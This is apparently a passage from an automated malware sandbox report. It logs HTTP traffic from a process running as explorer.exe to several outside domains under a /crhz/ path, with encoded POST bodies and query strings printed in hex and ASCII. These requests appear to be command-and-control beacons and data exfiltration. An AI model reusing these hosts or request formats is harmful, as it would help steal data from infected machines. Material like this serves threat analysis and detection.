                                                    date: Mon, 30 Jan 2023 12:41:06 GMT
                                                    keep-alive: timeout=5
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    16192.168.2.64973776.223.105.23080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:09.299675941 CET838OUTGET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.hvlandscapes.biz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:09.326175928 CET839INHTTP/1.1 301 Moved Permanently
                                                    location: http://hvlandscapes.biz/crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-0ec0b2a
                                                    x-version: 0ec0b2a
                                                    x-siteid: eu-central-1
                                                    set-cookie: dps_site_id=eu-central-1; path=/
                                                    date: Mon, 30 Jan 2023 12:41:09 GMT
                                                    keep-alive: timeout=5
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    17192.168.2.64973881.169.145.7280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:14.645462036 CET840OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.frogair.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.frogair.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 6a 35 70 30 64 58 39 36 37 6e 67 77 41 73 7a 7e 66 64 59 6f 67 4e 47 6e 43 46 48 54 49 4f 68 44 34 42 6d 4e 72 46 56 6f 74 4c 36 37 4d 53 34 64 30 32 76 53 66 6e 43 64 4c 36 68 67 6d 34 57 55 4d 63 31 53 67 6c 76 42 47 50 5f 4f 67 49 66 28 50 6b 4a 6c 46 4c 41 46 76 6a 30 6e 36 77 44 49 54 43 59 74 44 66 6f 4f 41 59 58 35 56 65 72 6b 51 76 36 33 64 43 63 62 32 43 51 71 67 6d 47 64 7a 54 71 6a 67 47 32 35 7a 4c 41 7a 32 56 35 63 45 39 34 6e 79 38 65 49 78 58 77 4c 5f 34 4d 72 4c 57 33 54 36 51 7a 6c 4e 41 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=vw0jN1Cj9L4JFj5p0dX967ngwAsz~fdYogNGnCFHTIOhD4BmNrFVotL67MS4d02vSfnCdL6hgm4WUMc1SglvBGP_OgIf(PkJlFLAFvj0n6wDITCYtDfoOAYX5VerkQv63dCcb2CQqgmGdzTqjgG25zLAz2V5cE94ny8eIxXwL_4MrLW3T6QzlNA.
                                                    Jan 30, 2023 13:41:14.669533014 CET840INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:14 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    18192.168.2.64974081.169.145.7280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:17.257637024 CET849OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.frogair.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.frogair.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 44 70 70 6e 71 4c 39 74 72 6e 76 73 51 73 7a 6c 76 63 77 6f 67 4a 47 6e 48 39 58 54 2d 7e 68 47 5f 74 6d 4a 35 39 56 6c 4e 4c 36 39 4d 53 43 44 45 33 6b 53 66 6a 34 64 4a 69 78 67 6c 55 57 58 72 59 31 55 6a 4e 67 4f 57 50 39 5a 77 49 63 28 50 6b 51 6c 46 62 4d 46 76 6e 65 6e 36 6f 44 49 68 71 59 71 7a 66 72 43 67 59 58 35 56 65 6e 6b 51 75 72 33 64 61 45 62 79 6d 41 72 57 4b 47 64 53 66 71 69 47 4f 78 28 7a 4b 4a 35 57 56 6f 61 32 6f 51 6e 44 35 74 65 45 44 31 63 4d 51 75 6d 59 6e 73 41 76 4e 70 32 71 55 43 6c 64 59 37 6b 79 4e 54 39 73 34 4e 6a 75 57 4f 63 64 6d 71 4a 42 4c 43 45 79 53 71 28 76 4c 79 73 2d 69 34 49 78 36 45 4a 74 51 6d 4e 47 77 55 4c 46 71 5a 74 44 4b 71 51 68 65 75 47 67 66 63 49 39 51 6b 30 79 6b 72 52 37 52 51 43 4d 48 46 6e 44 34 30 4e 62 73 62 6c 6f 66 50 7e 63 51 35 38 50 6f 63 35 67 66 5a 7a 49 75 59 4a 46 4a 69 47 50 4b 38 34 51 4e 6b 28 39 6b 6f 53 5f 6c 41 7e 75 57 38 70 61 6a 31 75 48 67 41 54 30 39 50 49 4f 6a 55 71 62 6d 30 55 55 38 67 49 5a 45 5a 46 49 7a 78 4a 54 4d 37 44 41 77 52 54 45 5a 6c 56 4a 79 51 4d 6a 41 30 75 32 49 44 4e 66 31 63 51 73 79 52 47 6b 4d 6c 56 38 61 4e 73 5a 41 38 51 78 33 32 7e 30 28 42 47 4b 34 7a 49 30 41 48 53 71 7e 33 4c 68 7a 6c 52 57 64 55 39 71 58 50 55 7a 50 65 66 4e 50 53 38 6a 71 66 69 54 39 30 72 47 38 43 64 6f 52 59 6c 36 6f 61 63 37 53 54 52 69 57 51 6e 49 56 32 6d 5a 64 6e 66 4e 76 41 54 38 35 71 66 79 68 66 63 52 7a 75 46 6e 4f 31 4a 46 6d 30 74 70 51 50 70 52 57 6b 7e 38 64 76 47 61 75 4b 54 56 6e 7a 30 74 43 63 45 68 76 44 50 37 37 59 4a 7a 43 6b 63 4d 57 46 4f 51 39 44 4e 4c 4e 36 79 50 4d 79 55 61 44 46 6b 36 65 50 4c 66 38 65 4a 66 5a 6e 45 6d 74 59 49 4e 50 68 39 71 62 47 64 73 79 38 65 74 59 58 74 46 66 57 46 64 53 6f 4b 45 4e 67 35 68 32 69 4e 48 4f 77 34 6a 4a 70 45 53 53 73 39 36 35 52 6d 78 51 69 75 53 6a 73 56 30 73 68 31 74 33 44 5a 6f 33 56 58 43 4a 74 67 57 38 4c 73 4a 43 4e 30 71 70 4a 31 43 79 4d 6e 6b 63 55 6c 76 46 6a 6d 34 44 5a 63 2d 71 39 63 72 57 44 73 47 79 35 62 4e 61 45 49 79 4b 68 38 49 64 35 6d 36 50 42 41 39 69 65 62 54 45 42 68 2d 49 43 72 5f 39 6f 64 50 49 67 45 56 46 6b 7a 77 46 79 50 63 66 69 55 33 4c 33 5a 71 54 43 43 74 72 76 4c 51 59 2d 62 4b 28 69 79 4e 50 67 6d 67 77 4a 61 36 70 6e 6c 34 58 6d 51 46 6d 39 59 52 65 63 36 49 63 35 67 63 48 6b 76 70 75 46 6d 68 28 4f 4e 30 41 5a 50 64 6f 4a 33 74 34 69 75 69 4d 37 45 47 77 68 32 55 49 51 69 51 4c 44 39 4e 73 51 34 52 4d 4b 7e 58 61 72 48 6d 65 4d 31 35 6f 4f 62 33 4d 70 44 53 28 6f 54 2d 34 51 57 55 79 4d 61 35 39 68 46 64 57 56 68 63 58 71 56 48 59 75 79 76 49 62 78 30 30 4b 53 66 38 7a 54 68 31 39 35 63 63 32 31 6d 52 69 63 42 58 2d 41 47 48 73 4f 52 39 51 4a 63 44 6b 47 6c 6e 54 4f 53 6f 6a 42 65 6a 38 6d 6f 47 71 32 67 35 30 76 58 45 5f 79 65 33 72 58 4e 44 6e 36 46 30 4b 42 79 72 66 30 48 51 2d 55 78 52 42 71 6c 57 4f 6b 6c 28 67 5a 6a 28 76 57 51 73 61 67 4e 65 74 34 78 4b 32 5a 64 72 51 28 33 63 74 34 4d 46 77 66 68 5a 6b 4e 46 6f 2d 70 6b 71 59 78 6a 64 47 5a 72 68 52 76 64 59 79 42 37 79 62 56 6e 62 6f 73 68 76 62 4d 75 39 34 36 46 31 5f 7a 73 65 38 6d 51 75 2d 63 43 31 75 39 51 7e 37 35 4c 6d 59 76 4b 51 64 51 77 43 30 6e 66 39 5a 6e 57 70 66 52 42 67 71 4a 64 4e 6c 56 6e 33 67 68 77 55 4a 58 72 35 71 43 6c 35 6e 41 49 73 6a 76 33 49 5f 6c 76 46 70 28 44 72 38 54 75 28 6e 79 73 6f 79 38 36 39 49 44 78 31 6c 68 6e 36 56 6b 41 4e 4c 45 30 48 62 73 56 51 58 43 73 38 5f 48 38 47 4b 68 7a 70 59 66 76 63 32 69 31 28 79 42 6c 61 57 49 69 42 46 42 7a 61 32 6e 32 31 55 50 37 7a 61 4f 5a 62 71 64 48 63 7a 6e 39 72 31 33 69 73 49 62 62 6b 73 5a 45 45 78 65 4d 63 74 79 50 50 53 49 57 70 44 70 33 37 34 33 41 34 52 30 62 7a 52 68 67 68 72 69 56 43 79 6a 5a 43 6c 43 79 74 7a 43 42 34 5a 5a 32 6e 35 6a 30 6e 42 61 39 62 56 78 64 6b 57 4b 6f 66 62 4a 79 79 54 77 31 66 55 54 39 70 6a 77 6b 52 6c 7a 77 53 68 71 73 6d 41 4a 6b 77 79 31 5a 79 63 6d 51 4c 79 51 6f 46 38 58 58 32 6e 6f 58 48 57 33 61 62 52 37 61 43 56 72 55 34 6a 6a 4e 73 4a 7e 52 59 4c 35 52 5a 37 69 6e 37 44 77 57 41 74 28 6d 48 44 61 38 68 35 55 6f 32 61
                                                    Data Ascii: vG=vw0jN1Cj9L4JFDppnqL9trnvsQszlvcwogJGnH9XT-~hG_tmJ59VlNL69MSCDE3kSfj4dJixglUWXrY1UjNgOWP9ZwIc(PkQlFbMFvnen6oDIhqYqzfrCgYX5VenkQur3daEbymArWKGdSfqiGOx(zKJ5WVoa2oQnD5teED1cMQumYnsAvNp2qUCldY7kyNT9s4NjuWOcdmqJBLCEySq(vLys-i4Ix6EJtQmNGwULFqZtDKqQheuGgfcI9Qk0ykrR7RQCMHFnD40NbsblofP~cQ58Poc5gfZzIuYJFJiGPK84QNk(9koS_lA~uW8paj1uHgAT09PIOjUqbm0UU8gIZEZFIzxJTM7DAwRTEZlVJyQMjA0u2IDNf1cQsyRGkMlV8aNsZA8Qx32~0(BGK4zI0AHSq~3LhzlRWdU9qXPUzPefNPS8jqfiT90rG8CdoRYl6oac7STRiWQnIV2mZdnfNvAT85qfyhfcRzuFnO1JFm0tpQPpRWk~8dvGauKTVnz0tCcEhvDP77YJzCkcMWFOQ9DNLN6yPMyUaDFk6ePLf8eJfZnEmtYINPh9qbGdsy8etYXtFfWFdSoKENg5h2iNHOw4jJpESSs965RmxQiuSjsV0sh1t3DZo3VXCJtgW8LsJCN0qpJ1CyMnkcUlvFjm4DZc-q9crWDsGy5bNaEIyKh8Id5m6PBA9iebTEBh-ICr_9odPIgEVFkzwFyPcfiU3L3ZqTCCtrvLQY-bK(iyNPgmgwJa6pnl4XmQFm9YRec6Ic5gcHkvpuFmh(ON0AZPdoJ3t4iuiM7EGwh2UIQiQLD9NsQ4RMK~XarHmeM15oOb3MpDS(oT-4QWUyMa59hFdWVhcXqVHYuyvIbx00KSf8zTh195cc21mRicBX-AGHsOR9QJcDkGlnTOSojBej8moGq2g50vXE_ye3rXNDn6F0KByrf0HQ-UxRBqlWOkl(gZj(vWQsagNet4xK2ZdrQ(3ct4MFwfhZkNFo-pkqYxjdGZrhRvdYyB7ybVnboshvbMu946F1_zse8mQu-cC1u9Q~75LmYvKQdQwC0nf9ZnWpfRBgqJdNlVn3ghwUJXr5qCl5nAIsjv3I_lvFp(Dr8Tu(nysoy869IDx1lhn6VkANLE0HbsVQXCs8_H8GKhzpYfvc2i1(yBlaWIiBFBza2n21UP7zaOZbqdHczn9r13isIbbksZEExeMctyPPSIWpDp3743A4R0bzRhghriVCyjZClCytzCB4ZZ2n5j0nBa9bVxdkWKofbJyyTw1fUT9pjwkRlzwShqsmAJkwy1ZycmQLyQoF8XX2noXHW3abR7aCVrU4jjNsJ~RYL5RZ7in7DwWAt(mHDa8h5Uo2aFpbYIHP3MHOGAIzllqP0mLNyc_tm(gubdVWD(6BgeFSqfWhkThUfadFQVckwE_7jbeJqyAM9ozXTzOL0zSejQgk.
                                                    Jan 30, 2023 13:41:17.278341055 CET850INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:17 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    19192.168.2.64974181.169.145.7280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:19.804721117 CET850OUTGET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:19.825449944 CET851INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:19 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.649721164.88.201.21480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:20.001878023 CET758OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sandpiper-apts.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.sandpiper-apts.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
                                                    Jan 30, 2023 13:40:20.210977077 CET759INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    20192.168.2.649742163.44.198.5080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:25.720735073 CET853OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.mitsubangsaen.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.mitsubangsaen.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 33 33 6d 64 59 63 42 6d 4b 44 4e 72 39 72 37 76 56 33 51 6e 4f 71 47 54 7a 6f 49 7a 48 68 54 77 55 6f 47 4c 37 69 33 44 4e 4a 45 76 59 4b 53 37 71 51 49 76 75 74 66 50 61 70 42 32 7e 55 4e 79 41 37 54 44 45 49 4a 4e 66 35 65 6c 6d 37 6e 32 6d 64 50 5a 50 2d 76 52 77 42 77 66 36 4f 6d 73 70 42 36 53 79 53 4f 32 28 66 69 6f 7a 65 58 37 32 41 75 65 30 35 56 53 7a 5f 56 63 66 44 52 59 4f 39 46 37 72 42 47 58 39 4a 31 55 7e 78 45 69 6e 62 46 32 6c 6b 42 34 30 6d 34 6c 39 39 6c 4a 6e 72 65 32 52 6d 30 5f 39 32 55 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=qoO5CdCa5IsO33mdYcBmKDNr9r7vV3QnOqGTzoIzHhTwUoGL7i3DNJEvYKS7qQIvutfPapB2~UNyA7TDEIJNf5elm7n2mdPZP-vRwBwf6OmspB6SySO2(fiozeX72Aue05VSz_VcfDRYO9F7rBGX9J1U~xEinbF2lkB40m4l99lJnre2Rm0_92U.
                                                    Jan 30, 2023 13:41:25.923171043 CET853INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    21192.168.2.649743163.44.198.5080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:28.446418047 CET855OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.mitsubangsaen.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.mitsubangsaen.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 32 55 7e 64 49 4c 56 6d 50 6a 4e 6f 79 4c 37 76 4f 6e 51 6a 4f 71 61 54 7a 70 38 64 48 53 28 77 55 35 57 4c 37 41 76 44 50 4a 45 76 51 71 53 33 6b 77 49 44 75 74 4c 44 61 74 45 42 7e 57 68 79 50 38 33 44 4d 75 39 4f 4b 5a 65 6e 78 72 6e 31 6d 64 50 32 50 39 48 64 77 42 38 35 36 49 4f 73 70 33 75 53 7a 69 4f 78 69 76 69 6f 7a 65 58 5f 32 41 76 50 30 35 64 61 7a 2d 64 4d 66 77 5a 59 4f 64 6c 37 34 6d 71 55 71 5a 31 59 30 52 46 76 72 72 6c 37 75 55 30 6e 32 48 55 54 74 39 39 68 6a 70 28 36 44 58 73 2d 6d 43 4b 55 48 71 71 45 77 55 6c 35 73 6a 73 5f 34 48 48 4b 42 35 46 51 77 71 36 76 30 57 55 4b 41 69 58 74 4f 6f 44 74 6c 6a 63 4f 57 51 74 77 71 37 5a 78 65 4f 49 7a 69 65 50 54 64 72 6c 34 4f 55 74 61 7e 69 6a 61 76 47 51 65 68 69 58 7a 30 55 51 58 35 6b 72 64 63 35 6d 2d 72 52 30 71 44 31 4b 36 7e 37 59 37 63 2d 52 32 51 67 32 46 72 4f 77 58 66 45 45 7a 30 63 4f 2d 52 38 44 2d 62 6e 70 43 71 6a 4e 4f 58 43 67 67 47 52 41 75 61 4c 72 4e 4a 31 37 76 54 4f 39 78 6e 2d 47 65 44 43 44 63 62 56 6c 34 31 67 6c 4e 75 43 4b 69 5a 6f 48 54 61 79 72 35 30 41 4e 42 52 72 56 51 42 2d 57 63 4a 50 75 37 56 4f 76 46 32 52 70 43 79 6e 56 65 57 72 4a 37 6d 6a 4f 70 4e 47 35 6b 39 78 4a 32 4e 5f 4c 36 4d 4e 4e 39 6e 39 61 38 58 4b 38 43 36 65 6e 51 31 4e 36 70 63 53 59 59 63 5a 35 67 44 39 77 75 34 75 67 4b 4d 48 7e 59 6b 35 70 4f 61 55 69 43 75 77 6a 77 51 46 58 62 7e 46 75 77 41 39 7a 49 47 4f 66 30 4b 55 6f 4c 5a 59 6c 6e 66 5f 47 49 44 75 6c 6e 32 6a 57 53 39 52 42 33 4b 6c 59 4b 66 70 75 31 64 58 43 37 4f 32 79 6f 36 67 46 67 5a 4e 78 4e 77 48 4e 72 4b 38 4d 52 47 74 4b 72 67 33 31 33 7e 65 50 6a 72 50 54 32 71 52 55 45 79 6e 75 6d 34 6a 61 74 4c 6e 47 47 54 4a 76 59 47 38 46 4c 52 6d 34 69 6b 6b 49 47 63 77 66 79 6d 64 32 5f 71 45 5a 39 77 36 51 31 48 66 77 57 64 58 61 31 4f 4f 6c 62 48 6c 38 6e 76 57 55 77 31 67 53 6f 43 63 35 41 64 33 37 4c 6f 6c 74 33 74 4f 79 54 53 69 34 70 56 4a 63 4d 68 79 45 32 33 39 62 37 64 6c 7e 6b 65 41 61 4f 75 5a 38 30 7a 79 56 53 6b 36 43 57 6b 6e 6c 79 76 6c 74 53 37 68 66 48 71 62 44 78 33 77 44 61 74 53 4a 54 31 72 6e 51 69 67 59 32 56 67 74 79 77 39 32 45 57 4d 50 75 79 4b 58 70 52 69 6d 76 45 59 48 6f 79 66 64 37 66 77 4e 61 66 39 68 56 6b 65 51 6d 59 34 6a 41 62 47 34 45 68 30 32 59 70 33 53 55 67 33 4c 73 61 51 35 62 4a 6e 50 56 4a 5a 79 6e 7e 37 47 6a 33 43 48 46 71 74 61 2d 66 6b 33 2d 67 52 6a 34 51 56 7a 36 61 39 4e 4a 49 37 6e 6f 38 4e 31 79 73 72 7a 77 61 2d 57 39 63 73 77 77 7e 30 5a 53 6c 34 37 37 32 4b 52 64 64 58 7e 53 59 4a 6d 4d 55 4f 37 65 7e 36 69 69 36 56 4b 61 52 51 59 48 52 74 54 43 64 37 38 77 36 53 49 64 36 4c 36 6f 30 49 45 66 73 57 48 46 4d 6d 53 79 32 49 6e 53 59 4e 36 62 67 64 55 37 7e 39 69 41 6b 36 7a 47 5a 4b 7e 66 6e 4c 32 45 62 4e 6e 57 6c 42 71 4a 79 45 65 50 65 41 53 30 44 36 48 48 36 5a 6b 57 62 6e 45 43 53 70 43 67 6b 6d 4f 59 78 7a 58 68 64 44 74 44 35 5f 58 63 44 37 55 5a 63 71 67 75 48 58 30 4d 47 56 51 61 6c 79 55 71 53 45 75 50 35 